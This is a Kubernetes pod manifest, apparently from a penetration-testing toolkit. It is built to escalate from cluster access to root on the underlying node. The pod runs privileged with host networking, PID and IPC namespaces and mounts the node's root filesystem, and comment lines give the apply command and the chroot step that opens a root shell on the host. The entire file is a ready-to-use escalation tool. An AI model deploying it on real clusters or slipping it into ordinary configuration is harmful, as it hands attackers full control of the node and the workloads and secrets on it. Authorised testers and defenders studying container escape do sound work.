---
syntax: yaml
---
# Run a high-privileged pod in order to escalate to the node
# kubectl apply -f run-privileged-pod.yaml
# kubectl exec -it pentest-privileged-pod -- chroot /host bash
apiVersion: v1
kind: Pod
metadata:
  name: pentest-privileged-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: pentest-privileged-pod
    image: alpine
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  #nodeName: k8s-control-plane-node
  volumes:
  - name: noderoot
    hostPath:
      path: /
